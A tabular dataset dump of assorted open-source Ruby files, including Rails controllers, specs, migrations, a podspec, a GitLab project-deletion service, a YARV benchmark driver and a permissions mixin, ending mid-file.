hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
111fe0fa8c279c1e3f08bc221b7955fb03dde728 | 1,287 | require 'yaml'
module Koine
class TestRunner
class Builder
def initialize(arguments)
initialize_from_yaml_config(arguments.config_file)
end
def build
TestRunner.new(@adapters)
end
private
def initialize_from_yaml_config(config_file)
config = YAML.load_file(config_file)
@adapters = config['adapters'].map do |adapter_config|
build_adapter(adapter_config.last)
end
end
def build_adapter(config)
adapter_name = config.delete('adapter')
adapter_class = adapter_name
if adapter_class.downcase == adapter_class.to_s
adapter_class = "Koine::TestRunner::Adapters::#{classify(adapter_class)}"
end
unless Object.const_defined?(adapter_class)
raise ArgumentError, "Cannot locate adapter #{adapter_name} => #{adapter_class}"
end
klass = Object.const_get(adapter_class)
klass.new(**symbolize_keys(config))
end
def classify(klass)
klass.to_s.split('_').map(&:capitalize).join('')
end
def symbolize_keys(hash)
{}.tap do |new_hash|
hash.each do |key, value|
new_hash[key.to_sym] = value
end
end
end
end
end
end
| 23.833333 | 90 | 0.61927 |
bbe1939171a7b44d470537d4a19b41c1841f121c | 6,978 | #encoding: utf-8
class PhotosController < ApplicationController
before_action :doorkeeper_authorize!, only: [:update],
if: lambda { authenticate_with_oauth? }
before_action :load_record, :only => [:show, :update, :repair, :destroy, :rotate]
before_action :require_owner, :only => [:update, :destroy, :rotate]
before_action :authenticate_user!, except: [:show],
unless: lambda { authenticated_with_oauth? }
before_action :return_here, :only => [:show, :invite, :inviter, :fix]
cache_sweeper :photo_sweeper, :only => [:update, :repair]
def show
@size = params[:size]
@size = "medium" if !%w(small medium large original).include?(@size)
@size = "small" if @photo.send("#{@size}_url").blank?
respond_to do |format|
format.html do
if params[:partial]
partial = (params[:partial] || 'photo').split('/').reject(&:blank?).join('/')
render :layout => false, :partial => partial, :object => @photo, :size => @size
return
end
@taxa = @photo.taxa.limit(100)
@observations = @photo.observations.limit(100)
@flags = @photo.flags
end
format.js do
partial = params[:partial] || 'photo'
render :layout => false, :partial => partial, :object => @photo
end
end
end
def update
if @photo.update_attributes( photo_params( params[:photo] ) )
respond_to do |format|
format.html do
flash[:notice] = t(:updated_photo)
redirect_to @photo.becomes(Photo)
end
format.json do
render json: @photo.as_json
end
end
else
# flash[:error] = t(:error_updating_photo, :photo_errors => @photo.errors.full_messages.to_sentence)
respond_to do |format|
format.html do
flash[:error] = t(:error_updating_photo, :photo_errors => @photo.errors.full_messages.to_sentence)
redirect_to @photo.becomes(Photo)
end
format.json do
render status: :unprocessable_entity, json: { errors: @photo.errors.as_json }
end
end
end
end
def local_photo_fields
# Determine whether we should include synclinks
@synclink_base = params[:synclink_base] unless params[:synclink_base].blank?
respond_to do |format|
format.html do
render partial: "photos/photo_list_form", locals: {
photos: [],
index: params[:index],
synclink_base: @synclink_base,
local_photos: true
}
end
end
end
def destroy
resource = @photo.observations.first || @photo.taxa.first
@photo.destroy
flash[:notice] = t(:photo_deleted)
redirect_back_or_default(resource || '/')
end
def fix
types = %w(FacebookPhoto FlickrPhoto PicasaPhoto)
@type = params[:type]
@type = 'FacebookPhoto' unless types.include?(@type)
@provider_name = @type.underscore.gsub(/_photo/, '')
@provider_identity = if @provider_name == 'flickr'
current_user.has_provider_auth('flickr')
else
current_user.send("#{@provider_name}_identity")
end
@photos = current_user.photos.page(params[:page]).per_page(120).order("photos.id ASC")
@photos = @photos.where(type: @type)
respond_to do |format|
format.html { render layout: 'bootstrap' }
end
end
def repair_all
@type = params[:type] if %w(FlickrPhoto FacebookPhoto PicasaPhoto).include?(params[:type])
if @type.blank?
respond_to do |format|
format.json do
msg = "You must specify a photo type"
flash[:error] = msg
render status: :unprocessable_entity, json: {error: msg}
end
end
return
end
key = "repair_photos_for_user_#{current_user.id}_#{@type}"
delayed_progress(key) do
@job = Photo.delay.repair_photos_for_user(current_user, @type)
end
respond_to do |format|
format.json do
case @status
when "done"
flash[:notice] = "Repaired photos"
render json: {message: "Repaired photos"}
when "error"
flash[:error] = @error_msg
render status: :unprocessable_entity, json: {error: @error_msg}
else
render status: :accepted, json: {message: 'In progress...'}
end
end
end
end
def repair
unless @photo.respond_to?(:repair)
flash[:error] = t(:repair_doesnt_work_for_that_kind_of_photo)
redirect_back_or_default(@photo.becomes(Photo))
return
end
url = @photo.taxa.first || @photo.observations.first || '/'
repaired, errors = Photo.repair_single_photo(@photo)
if repaired.destroyed?
flash[:error] = t(:photo_destroyed_because_it_was_deleted_from, :site_name => @site.site_name_short)
redirect_to url
elsif !errors.blank?
flash[:error] = t(:failed_to_repair_photo, :errors => errors.values.to_sentence)
redirect_back_or_default(@photo.becomes(Photo))
else
flash[:notice] = t(:photo_urls_repaired)
redirect_back_or_default(@photo.becomes(Photo))
end
end
def rotate
unless @photo.is_a?(LocalPhoto)
flash[:error] = t(:you_cant_rotate_photos_hostde_outside, :site_name => @site.site_name_short)
redirect_back_or_default(@photo.becomes(Photo))
end
rotation = params[:left] ? -90 : 90
@photo.rotate!(rotation)
redirect_back_or_default(@photo.becomes(Photo))
end
def create
@photo = LocalPhoto.new( file: params[:file],
user: current_user, mobile: is_mobile_app? )
respond_to do |format|
if [email protected]? && @photo.save
@photo.reload
format.html { redirect_to observations_path }
format.json do
json = @photo.as_json(include: {
to_observation: {
include: { observation_field_values:
{ include: :observation_field, methods: :taxon } },
methods: [ :tag_list ]
} } )
json[:original_url] = @photo.file.url(:original)
json[:large_url] = @photo.file.url(:large)
render json: json
end
else
format.html { redirect_to observations_path }
format.json do
errors = @photo.file.blank? ? { errors: "No photo specified" } : @photo.errors
render json: errors, status: :unprocessable_entity
end
end
end
end
private
def require_owner
unless logged_in? && @photo.editable_by?(current_user)
msg = t(:you_dont_have_permission_to_do_that)
respond_to do |format|
format.html do
flash[:error] = msg
return redirect_to @photo.becomes( Photo )
end
format.json do
return render json: { error: msg }, status: :forbidden
end
end
end
end
def photo_params( options = {} )
p = options.blank? ? params : options
allowed_fields = Photo::MASS_ASSIGNABLE_ATTRIBUTES + [:license, :license_code]
p.permit( allowed_fields )
end
end
| 32.607477 | 108 | 0.6274 |
217f1770302db83331812f5b1afa5f9a842ace7b | 120 | class AddStatusToFollow < ActiveRecord::Migration[5.1]
def change
add_column :follows, :status, :string
end
end
| 20 | 54 | 0.741667 |
e810b7e7e3e5eabd6a8c7fb847cd4e09621f7a6b | 9,863 | require 'spec_helper'
RSpec.describe 'Stacks Request' do
describe 'GET /v3/stacks' do
before { VCAP::CloudController::Stack.dataset.destroy }
let(:user) { make_user }
let(:headers) { headers_for(user) }
it 'returns 200 OK' do
get '/v3/stacks', nil, headers
expect(last_response.status).to eq(200)
end
context 'When stacks exist' do
let!(:stack1) { VCAP::CloudController::Stack.make }
let!(:stack2) { VCAP::CloudController::Stack.make }
let!(:stack3) { VCAP::CloudController::Stack.make }
it 'returns a paginated list of stacks' do
get '/v3/stacks?page=1&per_page=2', nil, headers
expect(parsed_response).to be_a_response_like(
{
'pagination' => {
'total_results' => 3,
'total_pages' => 2,
'first' => {
'href' => "#{link_prefix}/v3/stacks?page=1&per_page=2"
},
'last' => {
'href' => "#{link_prefix}/v3/stacks?page=2&per_page=2"
},
'next' => {
'href' => "#{link_prefix}/v3/stacks?page=2&per_page=2"
},
'previous' => nil
},
'resources' => [
{
'name' => stack1.name,
'description' => stack1.description,
'guid' => stack1.guid,
'metadata' => { 'labels' => {}, 'annotations' => {} },
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack1.guid}"
}
}
},
{
'name' => stack2.name,
'description' => stack2.description,
'guid' => stack2.guid,
'metadata' => { 'labels' => {}, 'annotations' => {} },
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack2.guid}"
}
}
}
]
}
)
end
it 'returns a list of name filtered stacks' do
get "/v3/stacks?names=#{stack1.name},#{stack3.name}", nil, headers
expect(parsed_response).to be_a_response_like(
{
'pagination' => {
'total_results' => 2,
'total_pages' => 1,
'first' => {
'href' => "#{link_prefix}/v3/stacks?names=#{stack1.name}%2C#{stack3.name}&page=1&per_page=50"
},
'last' => {
'href' => "#{link_prefix}/v3/stacks?names=#{stack1.name}%2C#{stack3.name}&page=1&per_page=50"
},
'next' => nil,
'previous' => nil
},
'resources' => [
{
'name' => stack1.name,
'description' => stack1.description,
'guid' => stack1.guid,
'metadata' => { 'labels' => {}, 'annotations' => {} },
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack1.guid}"
}
}
},
{
'name' => stack3.name,
'description' => stack3.description,
'guid' => stack3.guid,
'metadata' => { 'labels' => {}, 'annotations' => {} },
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack3.guid}"
}
}
}
]
}
)
end
context 'when there are labels' do
let!(:stack1_label) { VCAP::CloudController::StackLabelModel.make(
key_name: 'release',
value: 'stable',
resource_guid: stack1.guid
)
}
let!(:stack2_label) { VCAP::CloudController::StackLabelModel.make(
key_name: 'release',
value: 'unstable',
resource_guid: stack2.guid
)
}
it 'returns a list of label filtered stacks' do
get '/v3/stacks?label_selector=release=stable', nil, headers
expect(parsed_response).to be_a_response_like(
{
'pagination' => {
'total_results' => 1,
'total_pages' => 1,
'first' => {
'href' => "#{link_prefix}/v3/stacks?label_selector=release%3Dstable&page=1&per_page=50"
},
'last' => {
'href' => "#{link_prefix}/v3/stacks?label_selector=release%3Dstable&page=1&per_page=50"
},
'next' => nil,
'previous' => nil
},
'resources' => [
{
'name' => stack1.name,
'description' => stack1.description,
'guid' => stack1.guid,
'metadata' => {
'labels' => {
'release' => 'stable'
},
'annotations' => {}
},
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack1.guid}"
}
},
},
]
}
)
end
end
end
end
describe 'GET /v3/stacks/:guid' do
let(:user) { make_user }
let(:headers) { headers_for(user) }
let!(:stack) { VCAP::CloudController::Stack.make }
it 'returns details of the requested stack' do
get "/v3/stacks/#{stack.guid}", nil, headers
expect(last_response.status).to eq 200
expect(parsed_response).to be_a_response_like(
{
'name' => stack.name,
'description' => stack.description,
'guid' => stack.guid,
'metadata' => { 'labels' => {}, 'annotations' => {} },
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack.guid}"
}
}
}
)
end
end
describe 'POST /v3/stacks' do
let(:user) { make_user(admin: true) }
let(:request_body) do
{
name: 'the-name',
description: 'the-description',
metadata: {
labels: {
potato: 'yam',
},
annotations: {
potato: 'idaho',
}
}
}.to_json
end
let(:headers) { admin_headers_for(user) }
it 'creates a new stack' do
expect {
post '/v3/stacks', request_body, headers
}.to change {
VCAP::CloudController::Stack.count
}.by 1
created_stack = VCAP::CloudController::Stack.last
expect(last_response.status).to eq(201)
expect(parsed_response).to be_a_response_like(
{
'name' => 'the-name',
'description' => 'the-description',
'metadata' => {
'labels' => {
'potato' => 'yam'
},
'annotations' => {
'potato' => 'idaho'
},
},
'guid' => created_stack.guid,
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{created_stack.guid}"
}
}
}
)
end
context 'when there is a model validation failure' do
let(:name) { 'the-name' }
before do
VCAP::CloudController::Stack.make name: name
end
it 'responds with 422' do
post '/v3/stacks', request_body, headers
expect(last_response.status).to eq(422)
expect(last_response).to have_error_message('Name must be unique')
end
end
end
describe 'PATCH /v3/stacks/:guid' do
let(:user) { make_user(admin: true) }
let(:stack) { VCAP::CloudController::Stack.make }
let(:request_body) do
{
metadata: {
"labels": {
"potato": 'yam'
},
"annotations": {
"potato": 'idaho'
}
}
}.to_json
end
let(:headers) { admin_headers_for(user) }
it 'updates the metadata of a new stack' do
patch "/v3/stacks/#{stack.guid}", request_body, headers
expect(last_response.status).to eq(200)
expect(parsed_response).to be_a_response_like(
{
'name' => stack.name,
'description' => stack.description,
'metadata' => {
'labels' => {
'potato' => 'yam'
},
'annotations' => {
'potato' => 'idaho'
},
},
'guid' => stack.guid,
'created_at' => iso8601,
'updated_at' => iso8601,
'links' => {
'self' => {
'href' => "#{link_prefix}/v3/stacks/#{stack.guid}"
}
}
}
)
end
end
describe 'DELETE /v3/stacks/:guid' do
let(:user) { make_user(admin: true) }
let(:headers) { admin_headers_for(user) }
let(:stack) { VCAP::CloudController::Stack.make }
it 'destroys the stack' do
delete "/v3/stacks/#{stack.guid}", {}, headers
expect(last_response.status).to eq(204)
expect(stack).to_not exist
end
end
end
| 29.707831 | 109 | 0.440028 |
6195308bdf12bc891ed2ae5b807b358a131d5dc1 | 916 | Pod::Spec.new do |s|
s.name = 'FontasticIcons'
s.version = '0.2.1'
s.summary = 'Objective-C wrapper for iconic fonts.'
s.description = <<-DESC
- [Entypo](http://entypo.com) pictograms by Daniel Bruce.
- [FontAwesome](http://fortawesome.github.com/Font-Awesome/) by Dave Gandy.
- [Iconic](http://somerandomdude.com/work/iconic/) font by P.J. Onori.
DESC
s.homepage = 'https://github.com/AlexDenisov/FontasticIcons'
s.license = 'MIT'
s.author = { 'Alex Denisov' => '[email protected]' }
s.source = { :git => 'https://github.com/AlexDenisov/FontasticIcons.git', :tag => "#{s.version}" }
s.platform = :ios, '3.2'
s.source_files = 'FontasticIcons/Sources/Classes'
s.resources = 'FontasticIcons/Sources/Resources/Fonts/*'
s.frameworks = 'CoreText', 'QuartzCore'
end
| 48.210526 | 106 | 0.590611 |
6a16f55f92a6a56c2aad1bd4beda50d183c0b27f | 239 | cask :v1 => 'faux-pas' do
version :latest
sha256 :no_check
url 'http://api.fauxpasapp.com/download_latest'
appcast 'http://api.fauxpasapp.com/appcast'
homepage 'http://fauxpasapp.com'
license :unknown
app 'FauxPas.app'
end
| 19.916667 | 49 | 0.707113 |
395a6f1ab98f82e2e4cd9cfb0227aff0951af286 | 2,182 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Batch::Mgmt::V2018_12_01
module Models
#
# Model object.
#
#
class CertificateBaseProperties
include MsRestAzure
# @return [String] The algorithm of the certificate thumbprint. This must
# match the first portion of the certificate name. Currently required to
# be 'SHA1'.
attr_accessor :thumbprint_algorithm
# @return [String] The thumbprint of the certificate. This must match the
# thumbprint from the name.
attr_accessor :thumbprint
# @return [CertificateFormat] The format of the certificate - either Pfx
# or Cer. If omitted, the default is Pfx. Possible values include: 'Pfx',
# 'Cer'
attr_accessor :format
#
# Mapper for CertificateBaseProperties class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CertificateBaseProperties',
type: {
name: 'Composite',
class_name: 'CertificateBaseProperties',
model_properties: {
thumbprint_algorithm: {
client_side_validation: true,
required: false,
serialized_name: 'thumbprintAlgorithm',
type: {
name: 'String'
}
},
thumbprint: {
client_side_validation: true,
required: false,
serialized_name: 'thumbprint',
type: {
name: 'String'
}
},
format: {
client_side_validation: true,
required: false,
serialized_name: 'format',
type: {
name: 'Enum',
module: 'CertificateFormat'
}
}
}
}
}
end
end
end
end
| 28.710526 | 79 | 0.539872 |
6ace21cf53b25fa187cae27b3059931fe159d8eb | 367 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataMigration::Mgmt::V2018_04_19
module Models
#
# Defines values for ProjectTargetPlatform
#
module ProjectTargetPlatform
SQLDB = "SQLDB"
Unknown = "Unknown"
end
end
end
| 22.9375 | 70 | 0.711172 |
0320a0c8c3fe10b777617162d703aa76df22040d | 359 | # frozen_string_literal: true
class PreviewComponentPreview < ViewComponent::Preview
def default
render(PreviewComponent.new(cta: "Click me!", title: "Lorem Ipsum"))
end
def without_cta
render(PreviewComponent.new(title: "More lorem..."))
end
def with_content
render(PreviewComponent.new(title: "title")) { "some content" }
end
end
| 22.4375 | 72 | 0.721448 |
61ec3c2a41ca54c2a2621ce84f46af636e837836 | 1,552 | require 'test/unit'
module ActionController; end
class ActionController::Base
attr_reader :action_name
def self.process(req, res)
new.process req, res
end
def process(req, res)
params = req.parameters
@action_name = params['action']
end
def controller_class_name
self.class.name.split('::').last
end
end
require 'rails_remote_control/process'
class ApplicationController < ActionController::Base
include RailsRemoteControl::Process
end
class MyController < ApplicationController
def index
end
def show
end
end
module Nested; end
class Nested::MyController < ApplicationController
def index
end
def show
end
end
module RailsRemoteControl
def Process.reset
@requests_handled = 0
@requests_attempted = 0
@requests.clear
end
end
class TestRailsRemoteControlProcess < Test::Unit::TestCase
RRCP = RailsRemoteControl::Process
FakeRequest = Struct.new :parameters
def setup
@request = FakeRequest.new
@request.parameters = { 'action' => 'index' }
end
def teardown
RRCP.reset
end
def test_process
MyController.new.process @request, nil
assert_equal 1, RRCP.requests_handled
assert_equal 1, RRCP.requests_attempted
expected = { 'MyController#index' => 1 }
assert_equal expected, RRCP.requests
end
def test_process_nested
Nested::MyController.new.process @request, nil
assert_equal 1, RRCP.requests_handled
expected = { 'Nested::MyController#index' => 1 }
assert_equal expected, RRCP.requests
end
end
| 16.510638 | 58 | 0.724227 |
7af994d1ba5f8603cdcb45c2acc4d774542e2735 | 1,851 | #!/usr/local/bin/ruby
# -*- coding: utf-8 -*-
puts 1 + 2 # return 3
# <=> 联合比较运算符。如果第一个操作数等于第二个操作数则返回 0,如果第一个操作数大于第二个操作数则返回 1,如果第一个操作数小于第二个操作数则返回 -1。
puts 1 <=> 2 # return -1
# === 用于测试 case 语句的 when 子句内的相等。
puts (1..10) === 5 # return true
# .eql? 如果接收器和参数具有相同的类型和相等的值,则返回 true。
puts 1 == 1.0 # true
puts 1.eql?(1.0) # false
# equal? 如果接收器和参数具有相同的对象 id,则返回 true。
# 并行赋值
=begin
a, b, c = 10, 20, 30
a, b = b, c
=end
# 范围运算符
puts (1..10) # return 1 => 10
puts (1...10) # return 1 => 9
# defined? 运算符 => 以方法调用的形式来判断传递的表达式是否已定义。它返回表达式的描述字符串,如果表达式未定义则返回 nil。
defined? variable # 如果 variable 已经初始化,则为 True
foo = 42
defined? foo # => "local-variable"
defined? $_ # => "global-variable"
defined? bar # => nil(未定义)
defined? method_call # 如果方法已经定义,则为 True
defined? puts # => "method"
defined? puts(bar) # => nil(在这里 bar 未定义)
defined? unpack # => nil(在这里未定义)
# 如果存在可被 super 用户调用的方法,则为 True
defined? super # => "super"(如果可被调用)
defined? super # => nil(如果不可被调用)
defined? yield # => "yield"(如果已传递块)
defined? yield # => nil(如果未传递块)
# 点运算符 . 双冒号运算符 ::
# 通过在方法名称前加上类或模块名称和 . 来调用类或模块中的方法。你可以使用类或模块名称和两个冒号 :: 来引用类或模块中的常量。
# :: 是一元运算符,允许在类或模块内定义常量、实例方法和类方法,可以从类或模块外的任何地方进行访问。
MR_COUNT = 0 # 定义在主 Object 类上的常量
module Foo
MR_COUNT = 0
::MR_COUNT = 1 # 设置全局计数为 1
MR_COUNT = 2 # 设置局部计数为 2
end
puts MR_COUNT # 这是全局常量
puts Foo::MR_COUNT # 这是 "Foo" 的局部常量
CONST = " out there"
class Inside_one
CONST = proc { " in there" }
def where_is_my_CONST
::CONST + " inside one"
end
end
class Inside_two
CONST = " inside two"
def where_is_my_CONST
CONST
end
end
puts Inside_one.new.where_is_my_CONST
puts Inside_two.new.where_is_my_CONST
puts Object::CONST + Inside_two::CONST
puts Inside_two::CONST + CONST
puts Inside_one::CONST
puts Inside_one::CONST.call + Inside_two::CONST
| 20.797753 | 81 | 0.662345 |
1ccec6595cbef86b834cd4fa2900b7b7a6255280 | 1,085 | require 'utils/value_stringifier'
module ActiveFlags
class Flag < ApplicationRecord
belongs_to :subject, polymorphic: true
validates :subject, :key, :value, presence: true
validates :key, uniqueness: { scope: :subject }
after_save :notify_subject_flag_has_changed, if: proc { |flag| flag.saved_changes.key?('value') }
def notify_subject_flag_has_changed
subject.flag_has_changed(key, value) if subject&.respond_to?(:flag_has_changed)
true
end
def removing_duplicated_needed?
ActiveFlags::Flag.where(subject: subject, key: key).any?
end
def removing_duplicated_flags!
return false unless removing_duplicated_needed?
grouped = ActiveFlags::Flag
.where(subject_id: subject_id, subject_type: subject_type, key: key)
.group_by { |model| [model.key, model.subject_id, model.subject_type] }
grouped.values.each do |duplicates|
duplicates.shift
duplicates.each(&:destroy)
end
true
end
def converted_value
self.value = unstringify(value)
end
end
end
| 29.324324 | 101 | 0.700461 |
e2b2660ea71702d20fadd136252580e48cf56ad2 | 3,481 | module Projects
class DestroyService < BaseService
include Gitlab::ShellAdapter
DestroyError = Class.new(StandardError)
DELETED_FLAG = '+deleted'.freeze
def async_execute
project.update_attribute(:pending_delete, true)
job_id = ProjectDestroyWorker.perform_async(project.id, current_user.id, params)
Rails.logger.info("User #{current_user.id} scheduled destruction of project #{project.path_with_namespace} with job ID #{job_id}")
end
def execute
return false unless can?(current_user, :remove_project, project)
repo_path = project.path_with_namespace
wiki_path = repo_path + '.wiki'
# Flush the cache for both repositories. This has to be done _before_
# removing the physical repositories as some expiration code depends on
# Git data (e.g. a list of branch names).
flush_caches(project, wiki_path)
Projects::UnlinkForkService.new(project, current_user).execute
Project.transaction do
project.team.truncate
project.destroy!
unless remove_legacy_registry_tags
raise_error('Failed to remove some tags in project container registry. Please try again or contact administrator.')
end
unless remove_repository(repo_path)
raise_error('Failed to remove project repository. Please try again or contact administrator.')
end
unless remove_repository(wiki_path)
raise_error('Failed to remove wiki repository. Please try again or contact administrator.')
end
end
log_info("Project \"#{project.path_with_namespace}\" was removed")
system_hook_service.execute_hooks_for(project, :destroy)
true
end
private
def remove_repository(path)
# Skip repository removal. We use this flag when remove user or group
return true if params[:skip_repo] == true
# There is a possibility project does not have repository or wiki
return true unless gitlab_shell.exists?(project.repository_storage_path, path + '.git')
new_path = removal_path(path)
if gitlab_shell.mv_repository(project.repository_storage_path, path, new_path)
log_info("Repository \"#{path}\" moved to \"#{new_path}\"")
project.run_after_commit do
# self is now project
GitlabShellWorker.perform_in(5.minutes, :remove_repository, self.repository_storage_path, new_path)
end
else
false
end
end
##
# This method makes sure that we correctly remove registry tags
# for legacy image repository (when repository path equals project path).
#
def remove_legacy_registry_tags
return true unless Gitlab.config.registry.enabled
ContainerRepository.build_root_repository(project).tap do |repository|
return repository.has_tags? ? repository.delete_tags! : true
end
end
def raise_error(message)
raise DestroyError.new(message)
end
# Build a path for removing repositories
# We use `+` because its not allowed by GitLab so user can not create
# project with name cookies+119+deleted and capture someone stalled repository
#
# gitlab/cookies.git -> gitlab/cookies+119+deleted.git
#
def removal_path(path)
"#{path}+#{project.id}#{DELETED_FLAG}"
end
def flush_caches(project, wiki_path)
project.repository.before_delete
Repository.new(wiki_path, project).before_delete
end
end
end
| 32.839623 | 136 | 0.700948 |
e931966cca57bd7831adb258da2f0dc03afefe4c | 1,335 | #
# YARV benchmark driver
#
require 'yarvutil'
require 'benchmark'
require 'rbconfig'
def exec_command type, file, w
<<-EOP
$DRIVER_PATH = '#{File.dirname($0)}'
$LOAD_PATH.replace $LOAD_PATH | #{$LOAD_PATH.inspect}
require 'benchmark'
require 'yarvutil'
# print '#{type}'
begin
puts Benchmark.measure{
#{w}('#{file}')
}.utime
rescue Exception => exec_command_error_variable
puts "\t" + exec_command_error_variable.message
end
EOP
end
def benchmark cmd
rubybin = ENV['RUBY'] || File.join(
RbConfig::CONFIG["bindir"],
RbConfig::CONFIG["ruby_install_name"] + RbConfig::CONFIG["EXEEXT"])
IO.popen(rubybin, 'r+'){|io|
io.write cmd
io.close_write
return io.gets
}
end
def ruby_exec file
prog = exec_command 'ruby', file, 'load'
benchmark prog
end
def yarv_exec file
prog = exec_command 'yarv', file, 'YARVUtil.load_bm'
benchmark prog
end
$wr = $wy = nil
def measure bench
file = File.dirname($0) + "/bm_#{bench}.rb"
r = ruby_exec(file).to_f
y = yarv_exec(file).to_f
puts "#{bench}\t#{r}\t#{y}"
end
def measure2
r = ruby_exec.to_f
y = yarv_exec.to_f
puts r/y
end
if $0 == __FILE__
%w{
whileloop
whileloop2
times
const
method
poly_method
block
rescue
rescue2
}.each{|bench|
measure bench
}
end
| 16.280488 | 71 | 0.646442 |
d5d1a0169b1339d5a7214cf3c9f3942dbbc05dd0 | 5,869 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20120904130826) do
create_table "event_sign_ins", :primary_key => "event_sign_in_id", :force => true do |t|
t.integer "user_id", :null => false
t.string "eid", :limit => 31, :null => false
t.timestamp "created_at", :null => false
t.integer "created_by", :default => 0, :null => false
t.timestamp "updated_at", :null => false
t.integer "updated_by", :default => 0, :null => false
end
create_table "events", :primary_key => "event_id", :force => true do |t|
t.string "name", :limit => 127, :null => false
t.text "description", :null => false
t.string "location", :limit => 127, :null => false
t.datetime "start_time", :null => false
t.datetime "end_time"
t.string "facebook_eid", :limit => 127
t.float "position_lat"
t.float "position_lng"
t.timestamp "created_at", :null => false
t.integer "created_by", :default => 0, :null => false
t.timestamp "updated_at", :null => false
t.integer "updated_by", :default => 0, :null => false
end
create_table "user_details", :id => false, :force => true do |t|
t.integer "user_id", :null => false
t.string "concentration", :limit => 127, :null => false
t.date "graduation_date", :null => false
t.string "github_handle", :limit => 63
t.string "personal_url", :limit => 127
t.timestamp "created_at", :null => false
t.integer "created_by", :default => 0, :null => false
t.timestamp "updated_at", :null => false
t.integer "updated_by", :default => 0, :null => false
end
add_index "user_details", ["user_id"], :name => "index_user_details_on_user_id", :unique => true
create_table "user_types", :primary_key => "user_type_id", :force => true do |t|
t.string "type_name", :limit => 63, :null => false
t.timestamp "created_at", :null => false
t.integer "created_by", :default => 0, :null => false
t.timestamp "updated_at", :null => false
t.integer "updated_by", :default => 0, :null => false
end
add_index "user_types", ["type_name"], :name => "index_user_types_on_type_name", :unique => true
create_table "users", :primary_key => "user_id", :force => true do |t|
t.integer "user_type_id", :null => false
t.string "first_name", :limit => 63, :default => "", :null => false
t.string "last_name", :limit => 63, :default => "", :null => false
t.string "email", :limit => 127, :null => false
t.string "password_hash", :limit => 63, :null => false
t.string "confirmation_hash", :limit => 63
t.boolean "reg_email_sent", :default => false, :null => false
t.boolean "is_active", :default => false, :null => false
t.boolean "reset_password", :default => false, :null => false
t.datetime "last_login"
t.timestamp "created_at", :null => false
t.integer "created_by", :default => 0, :null => false
t.timestamp "updated_at", :null => false
t.integer "updated_by", :default => 0, :null => false
end
add_index "users", ["confirmation_hash"], :name => "index_users_on_confirmation_hash", :unique => true
add_index "users", ["email"], :name => "index_users_on_email", :unique => true
create_table "wiki_page_versions", :force => true do |t|
t.integer "page_id", :null => false
t.integer "updator_id"
t.integer "number"
t.string "comment"
t.string "path"
t.string "title"
t.text "content"
t.datetime "updated_at"
end
add_index "wiki_page_versions", ["page_id"], :name => "index_wiki_page_versions_on_page_id"
add_index "wiki_page_versions", ["updator_id"], :name => "index_wiki_page_versions_on_updator_id"
create_table "wiki_pages", :force => true do |t|
t.integer "creator_id"
t.integer "updator_id"
t.string "path"
t.string "title"
t.text "content"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "wiki_pages", ["creator_id"], :name => "index_wiki_pages_on_creator_id"
add_index "wiki_pages", ["path"], :name => "index_wiki_pages_on_path", :unique => true
end
| 52.401786 | 104 | 0.544045 |
21f7cc037cfd9c587e2f1395d7b3be7aae1d8905 | 3,435 | module AddPermissions
module Permissions
def self.included(base)
base.extend ClassMethods
end
module ClassMethods
def add_permissions
before_create :creatable?
before_save :updateable?
before_destroy :destroyable?
include AddPermissions::Permissions::InstanceMethods
extend AddPermissions::Permissions::SingletonMethods
#
# add permissions to associations
#
# loop over all associations
self.reflect_on_all_associations.each do |asoc|
# check if the associated class already has creatable_by_association? (set by another ActiveRecord with permissions)
unless defined? asoc.klass.saveable_by_association?
# add a new before_save filter to this ActiveRecord and the method creatable_by_association?
asoc.klass.class_eval do
def saveable_by_association?
res = true
# check only the changed methods
self.changed.each do |c|
# get the association for this method
a1 = self.class.reflect_on_all_associations.detect do |a|
a.primary_key_name == c
end
# if the changed method has an association
if a1
# get the associated ActiveRecord
ao = self.method(a1.name).call
# get the ActiveRecord's corresponding association
a2 = ao.class.reflect_on_all_associations.detect do |a|
a.primary_key_name == c and a.klass == self.class
end
# check if the method of the associated object for this ActiveRecord is updateable
if ao
begin
res &= ao.updateable?(a2.name)
rescue
end
end
errors.add_to_base 'The ' + self.class.name + ' associated with ' + ao.class.name + ' is not permitted to be saved.' unless res
end
end
res
end
# activate the before_save filter
before_save :saveable_by_association?
end
end
end
end
end
module InstanceMethods
def acting_user
ActiveRecord::Base.acting_user
end
def creatable?
true
end
def updateable? method = nil
true
end
def viewable? field
true
end
def destroyable?
true
end
def view field
if field.is_a?(Symbol) and viewable? field
if block_given?
yield self[field]
else
self[field]
end
end
end
end
module SingletonMethods
end
end
module AR
module Base
@@acting_user = nil
def acting_user= user
@@acting_user = user
end
def acting_user
@@acting_user
end
end
end
module AC
module Base
def pass_current_user
